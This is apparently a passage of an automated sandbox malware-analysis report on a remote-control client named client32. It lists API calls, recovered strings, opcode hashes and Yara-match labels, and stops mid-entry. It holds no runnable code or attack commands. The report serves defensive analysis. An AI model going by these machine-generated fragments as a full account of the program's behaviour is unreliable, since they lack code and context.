                                                                                                                                        • Opcode ID: 8a9499ee2ef28a037206f656659381a5d4f23bba0a59837185464dbccc275124
                                                                                                                                        • Instruction ID: e16a52dae8fc4f6add9a0662b3ed6ed4f7f6b3d42218f5107f1b6102d189f99a
                                                                                                                                        • Opcode Fuzzy Hash: 8a9499ee2ef28a037206f656659381a5d4f23bba0a59837185464dbccc275124
                                                                                                                                        • Instruction Fuzzy Hash: 30216A7A900128BBCB11DBE8CC41FFF7B7C9B95658F904948A601A7244EB35EA46C7E4
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 68907D00: __vswprintf.LIBCMT ref: 68907D26
                                                                                                                                          • Part of subcall function 688F5060: _free.LIBCMT ref: 688F506A
                                                                                                                                          • Part of subcall function 688F5060: _malloc.LIBCMT ref: 688F5090
                                                                                                                                        • _free.LIBCMT ref: 688FC2CA
                                                                                                                                          • Part of subcall function 68911BFD: HeapFree.KERNEL32(00000000,00000000), ref: 68911C13
                                                                                                                                          • Part of subcall function 68911BFD: GetLastError.KERNEL32(00000000), ref: 68911C25
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$ErrorFreeHeapLast__vswprintf_malloc
                                                                                                                                        • String ID: DT=%I64u$FLG=%d$ID=%d$MAX=%d$UID=%s
                                                                                                                                        • API String ID: 3180605519-2720776842
                                                                                                                                        • Opcode ID: 21ce4965c820d9279fe7eac8f3b702917cc07774c5a89b41146408ab95961282
                                                                                                                                        • Instruction ID: 127b3d35bfdba224d9427cfe31db385122154ffdc3b83d454f9b05a32a6f35ea
                                                                                                                                        • Opcode Fuzzy Hash: 21ce4965c820d9279fe7eac8f3b702917cc07774c5a89b41146408ab95961282
                                                                                                                                        • Instruction Fuzzy Hash: CB11A5B99406247FE7129A59DC80F7B73BCDFA2568B804419FC2897A12EB31E901C6F5
                                                                                                                                        APIs
                                                                                                                                        • __lock.LIBCMT ref: 68917960
                                                                                                                                          • Part of subcall function 6891F4BC: __mtinitlocknum.LIBCMT ref: 6891F4D2
                                                                                                                                          • Part of subcall function 6891F4BC: __amsg_exit.LIBCMT ref: 6891F4DE
                                                                                                                                          • Part of subcall function 6891F4BC: EnterCriticalSection.KERNEL32(00000000,00000000,?,68916E81,0000000D), ref: 6891F4E6
                                                                                                                                        • InterlockedDecrement.KERNEL32(00000000), ref: 68917972
                                                                                                                                        • _free.LIBCMT ref: 68917987
                                                                                                                                          • Part of subcall function 68911BFD: HeapFree.KERNEL32(00000000,00000000), ref: 68911C13
                                                                                                                                          • Part of subcall function 68911BFD: GetLastError.KERNEL32(00000000), ref: 68911C25
                                                                                                                                        • __lock.LIBCMT ref: 689179A0
                                                                                                                                        • ___removelocaleref.LIBCMT ref: 689179AF
                                                                                                                                        • ___freetlocinfo.LIBCMT ref: 689179C8
                                                                                                                                        • _free.LIBCMT ref: 689179E5
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __lock_free$CriticalDecrementEnterErrorFreeHeapInterlockedLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 556454624-0
                                                                                                                                        • Opcode ID: 8fac9bf5ca8ae03ecb128f57d8426189594e88e3e74b75d74e45fb3a97aa29b2
                                                                                                                                        • Instruction ID: 1698d323b68ae355001a2bb28957c350869c7e31eb65ea76688d9b98273e0104
                                                                                                                                        • Opcode Fuzzy Hash: 8fac9bf5ca8ae03ecb128f57d8426189594e88e3e74b75d74e45fb3a97aa29b2
                                                                                                                                        • Instruction Fuzzy Hash: 64118C3154DB1EBBEB209F68C544B6E73B89B10728FE04519E4F9DB1D8DB38C984C690
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Name::operator+$NameName::
                                                                                                                                        • String ID: throw(
                                                                                                                                        • API String ID: 168861036-3159766648
                                                                                                                                        • Opcode ID: a28d8e99d1c9aaeced55d56f278b424e619e90f236f0a5c781ae1f345f47418b
                                                                                                                                        • Instruction ID: d98aace9656fae59f53ae4de4accc7f586041590b8b1e35e35a492928c6af089
                                                                                                                                        • Opcode Fuzzy Hash: a28d8e99d1c9aaeced55d56f278b424e619e90f236f0a5c781ae1f345f47418b
                                                                                                                                        • Instruction Fuzzy Hash: 22015275A60109EFCF18DFA4C865DFE7BB9EB9930CF804054B511BB299DB30E9458B84
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,689372D8,00000008,68916F3F,00000000,00000000), ref: 68916E48
                                                                                                                                        • __lock.LIBCMT ref: 68916E7C
                                                                                                                                          • Part of subcall function 6891F4BC: __mtinitlocknum.LIBCMT ref: 6891F4D2
                                                                                                                                          • Part of subcall function 6891F4BC: __amsg_exit.LIBCMT ref: 6891F4DE
                                                                                                                                          • Part of subcall function 6891F4BC: EnterCriticalSection.KERNEL32(00000000,00000000,?,68916E81,0000000D), ref: 6891F4E6
                                                                                                                                        • InterlockedIncrement.KERNEL32(?), ref: 68916E89
                                                                                                                                        • __lock.LIBCMT ref: 68916E9D
                                                                                                                                        • ___addlocaleref.LIBCMT ref: 68916EBB
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                                                                        • String ID: KERNEL32.DLL
                                                                                                                                        • API String ID: 637971194-2576044830
                                                                                                                                        • Opcode ID: 32984d81f5d6ad6c06d7b454de2e1c7955502f16114b154a5020b8fd56be0590
                                                                                                                                        • Instruction ID: 47c5a01e593d9bde7b022498d459a27f7305b9987287ab06eff3f5c97242ba7e
                                                                                                                                        • Opcode Fuzzy Hash: 32984d81f5d6ad6c06d7b454de2e1c7955502f16114b154a5020b8fd56be0590
                                                                                                                                        • Instruction Fuzzy Hash: 9A017C7590CB14DFDB218F65C44535ABBE0AF61328F90890ED5D6A23A0CBB4E540CB54
                                                                                                                                        APIs
                                                                                                                                        • __getptd.LIBCMT ref: 6891A1D4
                                                                                                                                          • Part of subcall function 68916F64: __getptd_noexit.LIBCMT ref: 68916F67
                                                                                                                                          • Part of subcall function 68916F64: __amsg_exit.LIBCMT ref: 68916F74
                                                                                                                                        • __getptd.LIBCMT ref: 6891A1E5
                                                                                                                                        • __getptd.LIBCMT ref: 6891A1F3
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                                        • String ID: MOC$RCC$csm
                                                                                                                                        • API String ID: 803148776-2671469338
                                                                                                                                        • Opcode ID: 33004280def899aedbdd59ab7d35921a2397866726736b24204f4e0db693ef8a
                                                                                                                                        • Instruction ID: 525b041ee30ef258a90152d0e3e6e0367babb19e0c8a23f39ea24a783e9997a7
                                                                                                                                        • Opcode Fuzzy Hash: 33004280def899aedbdd59ab7d35921a2397866726736b24204f4e0db693ef8a
                                                                                                                                        • Instruction Fuzzy Hash: 13E01234A1D30C9ED701A774C14576876E9AB4821CFD541E1D5ACC7321D724E994CA42
                                                                                                                                        APIs
                                                                                                                                        • __getptd.LIBCMT ref: 6891654B
                                                                                                                                          • Part of subcall function 68916F64: __getptd_noexit.LIBCMT ref: 68916F67
                                                                                                                                          • Part of subcall function 68916F64: __amsg_exit.LIBCMT ref: 68916F74
                                                                                                                                        • __amsg_exit.LIBCMT ref: 6891656B
                                                                                                                                        • __lock.LIBCMT ref: 6891657B
                                                                                                                                        • InterlockedDecrement.KERNEL32(?), ref: 68916598
                                                                                                                                        • _free.LIBCMT ref: 689165AB
                                                                                                                                        • InterlockedIncrement.KERNEL32(025E16E0), ref: 689165C3
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3470314060-0
                                                                                                                                        APIs
                                                                                                                                        • __getptd.LIBCMT ref: 68917A20
                                                                                                                                          • Part of subcall function 68916F64: __getptd_noexit.LIBCMT ref: 68916F67
                                                                                                                                          • Part of subcall function 68916F64: __amsg_exit.LIBCMT ref: 68916F74
                                                                                                                                        • __calloc_crt.LIBCMT ref: 68917A2B
                                                                                                                                          • Part of subcall function 6891D3F5: Sleep.KERNEL32(00000000,68916F16,00000001,00000214), ref: 6891D41D
                                                                                                                                        • __lock.LIBCMT ref: 68917A61
                                                                                                                                        • ___addlocaleref.LIBCMT ref: 68917A6D
                                                                                                                                        • __lock.LIBCMT ref: 68917A81
                                                                                                                                        • InterlockedIncrement.KERNEL32(?), ref: 68917A91
                                                                                                                                          • Part of subcall function 689160F9: __getptd_noexit.LIBCMT ref: 689160F9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __getptd_noexit__lock$IncrementInterlockedSleep___addlocaleref__amsg_exit__calloc_crt__getptd
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3803058747-0
                                                                                                                                        APIs
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898,?,68903061,?), ref: 688F69EB
                                                                                                                                        • _free.LIBCMT ref: 688F6A07
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898), ref: 688F6A1B
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$EnterLeave_free
                                                                                                                                        • String ID: FAILED_REASON$LICENSE
                                                                                                                                        • API String ID: 2208350527-1913596546
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HandleModule
                                                                                                                                        • String ID: %s: $HTCTL32
                                                                                                                                        • API String ID: 4139908857-3797952780
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _strncpy$wsprintf
                                                                                                                                        • String ID: %s (%s)
                                                                                                                                        • API String ID: 2895084632-1363028141
                                                                                                                                        APIs
                                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 688FF48A
                                                                                                                                          • Part of subcall function 68911960: std::exception::exception.LIBCMT ref: 68911975
                                                                                                                                          • Part of subcall function 68911960: __CxxThrowException@8.LIBCMT ref: 6891198A
                                                                                                                                          • Part of subcall function 68911960: std::exception::exception.LIBCMT ref: 6891199B
                                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 688FF4C7
                                                                                                                                          • Part of subcall function 68911913: std::exception::exception.LIBCMT ref: 68911928
                                                                                                                                          • Part of subcall function 68911913: __CxxThrowException@8.LIBCMT ref: 6891193D
                                                                                                                                          • Part of subcall function 68911913: std::exception::exception.LIBCMT ref: 6891194E
                                                                                                                                        • _memmove.LIBCMT ref: 688FF528
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_$_memmove
                                                                                                                                        • String ID: invalid string position$string too long
                                                                                                                                        • API String ID: 1615890066-4289949731
                                                                                                                                        APIs
                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,00000000,00000000,76944C70), ref: 110EB1B1
                                                                                                                                        • _free.LIBCMT ref: 110EB1CC
                                                                                                                                          • Part of subcall function 1115F3B5: HeapFree.KERNEL32(00000000,00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3CB
                                                                                                                                          • Part of subcall function 1115F3B5: GetLastError.KERNEL32(00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3DD
                                                                                                                                        • RegQueryValueExA.ADVAPI32(000007FF,?,00000000,?,00000000,000007FF), ref: 110EB20A
                                                                                                                                        • _free.LIBCMT ref: 110EB293
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: QueryValue_free$ErrorFreeHeapLast
                                                                                                                                        • String ID: Error %d getting %s
                                                                                                                                        • API String ID: 3888477750-2709163689
                                                                                                                                        • Opcode ID: 99a52e7cc423a9fb728a5c7937be03a162a1ca7ac1d80426d03d15f8f4c4acb2
                                                                                                                                        • Instruction ID: 4c35e499aaf5ad9a009ae928ade364ef1dd2f983720d507f3f6301ea2f5437f7
                                                                                                                                        • Opcode Fuzzy Hash: 99a52e7cc423a9fb728a5c7937be03a162a1ca7ac1d80426d03d15f8f4c4acb2
                                                                                                                                        • Instruction Fuzzy Hash: FA316175D001299FDB90DA55CC84BAEB7F9AF45304F05C0E9E959A7240DE306E85CFE1
                                                                                                                                        APIs
                                                                                                                                        • SetEvent.KERNEL32(?,?,00000000,1106AF10,?,?,?,?,?), ref: 1106D1C2
                                                                                                                                        • wsprintfA.USER32 ref: 1106D299
                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?), ref: 1106D2BF
                                                                                                                                          • Part of subcall function 11139BB0: std::_Xinvalid_argument.LIBCPMT ref: 11139BCA
                                                                                                                                          • Part of subcall function 1110C8A0: EnterCriticalSection.KERNEL32(?,A0A8B03E,?,?,?,?,?,?), ref: 1110C8D4
                                                                                                                                          • Part of subcall function 1110C8A0: LeaveCriticalSection.KERNEL32(?,?,?), ref: 1110C911
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$Leave$EnterEventXinvalid_argumentstd::_wsprintf
                                                                                                                                        • String ID: ..\ctl32\Connect.cpp$erased=%d, idata->dead=%d
                                                                                                                                        • API String ID: 1787781242-2624497655
                                                                                                                                        • Opcode ID: 7e669e9a5a4f37c27c7146ff50ba6d66a74f2ada1778d74f9747df45e64f0b3c
                                                                                                                                        • Instruction ID: 04573714079795333ec223b70536839c78a5a0195139b0015b045f9e3d8978cb
                                                                                                                                        • Opcode Fuzzy Hash: 7e669e9a5a4f37c27c7146ff50ba6d66a74f2ada1778d74f9747df45e64f0b3c
                                                                                                                                        • Instruction Fuzzy Hash: CD318975E00296EFDB25CF50C880F9EB3B8AB45318F0085DAE54A6B241DB70EAC5CB61
                                                                                                                                        APIs
                                                                                                                                        • EnterCriticalSection.KERNEL32(?,27CEFB69), ref: 6890FB04
                                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 6890FB3E
                                                                                                                                        • SetEvent.KERNEL32(?), ref: 6890FB69
                                                                                                                                        • LeaveCriticalSection.KERNEL32(00000000,00000000), ref: 6890FBA4
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$EnterEventLeaveXinvalid_argumentstd::_
                                                                                                                                        • String ID: list<T> too long
                                                                                                                                        • API String ID: 930337060-4027344264
                                                                                                                                        • Opcode ID: 26959fe81b62d98f5b3110d8d632878b4b024524be641f92d759ad3f66264f5b
                                                                                                                                        • Instruction ID: dc4b591f3e8d7e0cf65289ad8a9e0e7a8f8a09a963586c21ed1485cc3e329be0
                                                                                                                                        • Opcode Fuzzy Hash: 26959fe81b62d98f5b3110d8d632878b4b024524be641f92d759ad3f66264f5b
                                                                                                                                        • Instruction Fuzzy Hash: 45314D75608704AFDB24CF68C894A6ABBF8FB89318F50861DE85ED7684D770E900CB64
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 1110C8A0: EnterCriticalSection.KERNEL32(?,A0A8B03E,?,?,?,?,?,?), ref: 1110C8D4
                                                                                                                                          • Part of subcall function 1110C8A0: LeaveCriticalSection.KERNEL32(?,?,?), ref: 1110C911
                                                                                                                                        • SetEvent.KERNEL32(?,?,00000000,1106AF10,?,?,?,?,?), ref: 1106D1C2
                                                                                                                                        • wsprintfA.USER32 ref: 1106D299
                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?), ref: 1106D2BF
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$Leave$EnterEventwsprintf
                                                                                                                                        • String ID: ..\ctl32\Connect.cpp$erased=%d, idata->dead=%d
                                                                                                                                        • API String ID: 3430577181-2624497655
                                                                                                                                        • Opcode ID: acfe9df1836c1e9302e8be9c47d6b3a855bab0fd3b4b46642e96841f146edea2
                                                                                                                                        • Instruction ID: 536c81e74eca5bf7a4e2791cfcdf9f566333e3a1added10bfa629768b284d793
                                                                                                                                        • Opcode Fuzzy Hash: acfe9df1836c1e9302e8be9c47d6b3a855bab0fd3b4b46642e96841f146edea2
                                                                                                                                        • Instruction Fuzzy Hash: 21317A75E00296EFD725CF90C884F9EF7F9AB45314F00819AD54A9B241DB70E9C1CB61
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 68907D00: __vswprintf.LIBCMT ref: 68907D26
                                                                                                                                          • Part of subcall function 688F5060: _free.LIBCMT ref: 688F506A
                                                                                                                                          • Part of subcall function 688F5060: _malloc.LIBCMT ref: 688F5090
                                                                                                                                        • _free.LIBCMT ref: 688FBB46
                                                                                                                                          • Part of subcall function 68911BFD: HeapFree.KERNEL32(00000000,00000000), ref: 68911C13
                                                                                                                                          • Part of subcall function 68911BFD: GetLastError.KERNEL32(00000000), ref: 68911C25
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$ErrorFreeHeapLast__vswprintf_malloc
                                                                                                                                        • String ID: CMD=MESSAGERECEIVED$ID=%d$UF=%d$UN=%s
                                                                                                                                        • API String ID: 3180605519-2489130399
                                                                                                                                        • Opcode ID: b876621d46b5c548b37038788c0dea2f89ccdfe5cba8ec62ff423474cca3997a
                                                                                                                                        • Instruction ID: 3805b5eb88ff155816c088b9ea8f6cb8ab9e2a214a3d17f8b9168b3d7ee65f6d
                                                                                                                                        • Opcode Fuzzy Hash: b876621d46b5c548b37038788c0dea2f89ccdfe5cba8ec62ff423474cca3997a
                                                                                                                                        • Instruction Fuzzy Hash: D12138BA900219BBDB11DBA8CD40FFF777CAF94254F908919B905A7144EB31EA04C7B5
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 68907D00: __vswprintf.LIBCMT ref: 68907D26
                                                                                                                                          • Part of subcall function 688F5060: _free.LIBCMT ref: 688F506A
                                                                                                                                          • Part of subcall function 688F5060: _malloc.LIBCMT ref: 688F5090
                                                                                                                                        • _free.LIBCMT ref: 688FBC16
                                                                                                                                          • Part of subcall function 68911BFD: HeapFree.KERNEL32(00000000,00000000), ref: 68911C13
                                                                                                                                          • Part of subcall function 68911BFD: GetLastError.KERNEL32(00000000), ref: 68911C25
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$ErrorFreeHeapLast__vswprintf_malloc
                                                                                                                                        • String ID: CMD=MESSAGEACK$ID=%d$UF=%d$UN=%s
                                                                                                                                        • API String ID: 3180605519-89615960
                                                                                                                                        • Opcode ID: e866ae189034018e012b88f83dad6ea51ea3445507f9bbc17f75cebc308209b6
                                                                                                                                        • Instruction ID: 0792d5c1e87dac996d2673e889b61731a0492f6ca8a9c621aa7da3e7e125a20d
                                                                                                                                        • Opcode Fuzzy Hash: e866ae189034018e012b88f83dad6ea51ea3445507f9bbc17f75cebc308209b6
                                                                                                                                        • Instruction Fuzzy Hash: 6C2124BA900219BADB11DAA8CD40FFF777C9B98254F908919A905A7144EA31EA44C7B2
                                                                                                                                        APIs
                                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000100), ref: 688F2ACB
                                                                                                                                        • _strrchr.LIBCMT ref: 688F2ADA
                                                                                                                                        • _strrchr.LIBCMT ref: 688F2AEA
                                                                                                                                        • wsprintfA.USER32 ref: 688F2B05
                                                                                                                                          • Part of subcall function 688F2CE0: GetModuleHandleA.KERNEL32(NSMTRACE,688F2AB1), ref: 688F2CFA
                                                                                                                                        Strings
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Module_strrchr$FileHandleNamewsprintf
                                                                                                                                        • String ID: HTCTL32
                                                                                                                                        • API String ID: 2529650285-1670862073
                                                                                                                                        • Opcode ID: 51f632195a8ff683293888b2003b1a2332409504805a2aa791fdc2262f5dbc4f
                                                                                                                                        • Instruction ID: f41ae93f6dc7b2417e750f2de2046536182aad671636aa656f1c2c61fdb7c66f
                                                                                                                                        • Opcode Fuzzy Hash: 51f632195a8ff683293888b2003b1a2332409504805a2aa791fdc2262f5dbc4f
                                                                                                                                        • Instruction Fuzzy Hash: 752135349083989BDB22DB788D45BEA3BB4DB1B348FC008E8DD8A5F181D7748946C791
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 688F7E0E
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898,?,?,?,00000000), ref: 688F7EB7
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898,?,?,?,00000000), ref: 688F7ED0
                                                                                                                                        Strings
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$EnterLeave_memset
                                                                                                                                        • String ID: RESULT$b
                                                                                                                                        • API String ID: 3751686142-4141403093
                                                                                                                                        • Opcode ID: 02b07f75caee9767b80a4c0d11cb74921a0d10535b1e6bda20a64b321819c940
                                                                                                                                        • Instruction ID: 5ace48902db25204025466b976886941d73cadaebd527fdcf19d88d7a4f4c54e
                                                                                                                                        • Opcode Fuzzy Hash: 02b07f75caee9767b80a4c0d11cb74921a0d10535b1e6bda20a64b321819c940
                                                                                                                                        • Instruction Fuzzy Hash: BF217EB1C04208AFEF20DFA4C8057AEBBF5FF09304F4044AAD559E6280EB359A44CFA1
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memset_strncpy
                                                                                                                                        • String ID: apptype == APP_SLAVE$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$sv.slavetype == APP_SLAVE
                                                                                                                                        • API String ID: 3140232205-2748231828
                                                                                                                                        • Opcode ID: 1d29ad1a6b9c88dda8d2a4ea31f57cf4e8e776fe64493609e5df09d1e80a97c1
                                                                                                                                        • Instruction ID: 2a211fb18fa806c17ac7e550b8f1ba377efe5f4be8e47cc024d983ccc1302d92
                                                                                                                                        • Opcode Fuzzy Hash: 1d29ad1a6b9c88dda8d2a4ea31f57cf4e8e776fe64493609e5df09d1e80a97c1
                                                                                                                                        • Instruction Fuzzy Hash: F7113636B443217BEB104958AC02BEF3398CB52798F810436FE18E67D1E331E896CB95
                                                                                                                                        APIs
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893CF98,?,00000000,27CEFB69), ref: 689106AD
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893CF98,?,00000000,27CEFB69), ref: 689106F9
                                                                                                                                        • DeleteCriticalSection.KERNEL32(?,27CEFB69), ref: 68910700
                                                                                                                                        Strings
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$DeleteEnterLeave
                                                                                                                                        • String ID: Refcount.cpp$p < ep
                                                                                                                                        • API String ID: 655268472-358336193
                                                                                                                                        • Opcode ID: 78d3c1b74c031eccaa98ede8373dc603a9813ccd250b3c3dc5ea1c7501a9f077
                                                                                                                                        • Instruction ID: f77947de7d6a2a0b922ab152b45ee0ef5357fa4781a6c3e7580d3a54a60f9663
                                                                                                                                        • Opcode Fuzzy Hash: 78d3c1b74c031eccaa98ede8373dc603a9813ccd250b3c3dc5ea1c7501a9f077
                                                                                                                                        • Instruction Fuzzy Hash: E321D57694C628EFCB20DF58CD40F6EB7A8FB86754F80061AF896A3240D771D800CBA1
                                                                                                                                        APIs
                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6890FE0A
                                                                                                                                        • EnterCriticalSection.KERNEL32 ref: 6890FE19
                                                                                                                                        • LeaveCriticalSection.KERNEL32 ref: 6890FE8C
                                                                                                                                          • Part of subcall function 6890F540: InitializeCriticalSection.KERNEL32(6893CF98,27CEFB69,?,?,?,?,?,6892EFC8,000000FF), ref: 6890F574
                                                                                                                                          • Part of subcall function 6890F540: EnterCriticalSection.KERNEL32(6893CF98,27CEFB69,?,?,?,?,?,6892EFC8,000000FF), ref: 6890F590
                                                                                                                                          • Part of subcall function 6890F540: LeaveCriticalSection.KERNEL32(6893CF98,?,?,?,?,?,6892EFC8,000000FF), ref: 6890F5D8
                                                                                                                                        Strings
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$EnterLeave$CurrentInitializeThread
                                                                                                                                        • String ID: Refcount.cpp$p.second
                                                                                                                                        • API String ID: 2150084884-1554893322
                                                                                                                                        • Opcode ID: ad5546563f885f584d742f8df1fcdcddaf3334f2ca3699cea7ee588070ad86af
                                                                                                                                        • Instruction ID: cf5dd3a6f30d72aaecd300adf1d72b829c2dcdc8fe33ab4e4edd1cef353f49de
                                                                                                                                        • Opcode Fuzzy Hash: ad5546563f885f584d742f8df1fcdcddaf3334f2ca3699cea7ee588070ad86af
                                                                                                                                        • Instruction Fuzzy Hash: FF216276904608AFCB21DF94D841FEFB7B8FF19318F50461EE516A3680D770A605CB95
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __strdup
                                                                                                                                        • String ID: *this==src$IsA()$NSMString.cpp$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                                                                        • API String ID: 838363481-1357550281
                                                                                                                                        • Opcode ID: 23d029142cee983248ae457151ce8ef0a09c94870d5e30484585e425a6cc80cf
                                                                                                                                        • Instruction ID: 744562d3c235ea29647c6d3fe69bc9bb6321f2871c3ad1445b93273320cab6dc
